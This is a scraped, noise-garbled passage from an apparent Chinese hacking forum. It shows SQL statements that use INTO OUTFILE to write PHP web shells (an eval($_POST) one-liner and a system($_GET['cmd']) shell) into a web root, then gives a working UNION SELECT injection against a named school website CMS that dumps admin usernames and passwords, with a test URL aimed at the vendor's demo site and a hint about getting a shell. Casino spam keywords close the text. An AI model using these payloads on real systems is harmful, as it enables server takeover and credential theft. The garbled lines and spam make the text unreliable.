% a5 U  Z% w6 i/ A3 v4 FDrop TABLE IF EXISTS study;
+ r! I. F& K( }5 P3 ^: ]3 {<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
3 o# U- A- N8 m1 @4 P3 xSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
& j  E8 k2 m2 f2 W6 D. j* K0 B方法四：
9 J; `5 f' M. D, ~& v8 i: }7 t5 hselect load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
# x9 ?1 E+ W, T3 m' j3 @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 v8 M; }9 U# O. X
4 ~4 ?% I$ _% ^- D. {; t/ ^9 xNO.001中学网站管理系统 Build 110628 注入漏洞
: X3 |! i$ N1 e( L; s  U4 o2 C
NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
& j0 }0 n$ g( B6 ]0 y5 W3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
2 k* |; x: w& \6 A- y8 @# z4.视频图片管理:一级分类,动态添加视频或者图片等信息
, u; T* E+ K4 F- C9 o5 h, b5.留言管理:对留言,修改,删除、回复等管理
6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
默认后台:admin/login.asp
官方演示:http://demo.001cms.net
$ i8 _9 B: B+ e, k3 O源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
7 c. h3 s4 _( c/ z3 b  yunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! ?1 S+ p2 I+ h, ~测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
getshell:后台有备份，你懂的
/ ^( @  N2 `1 r8 A另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines